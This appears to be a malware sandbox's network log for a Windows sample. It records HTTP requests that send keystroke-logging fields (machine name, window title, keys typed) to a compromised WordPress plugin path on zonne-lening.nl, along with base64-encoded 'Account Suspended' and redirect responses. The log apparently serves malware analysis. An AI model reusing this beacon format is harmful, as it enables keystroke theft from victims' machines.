TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 10:54:26 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
28 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20AM text/html post.php 302 Found HTML 345.0 B 05/13/53 18:46:03
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT04OjU0JTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
d0c6b5f405ded9d7954c4a7816e570ef117dab13aab276c4cb3598f9fcc171f0
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 16:54:29 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
29 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 05/13/53 19:34:44
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 16:54:30 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
30 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20AM text/html post.php 302 Found HTML 379.0 B 05/13/53 22:41:47
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9ODo1
NCUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
89b71171664d9c44b6fc0c2b165b0501c64a1cb892a046c813b084b3b80aae59
Referer
Magic
HyperText Markup Language (HTML)
Request
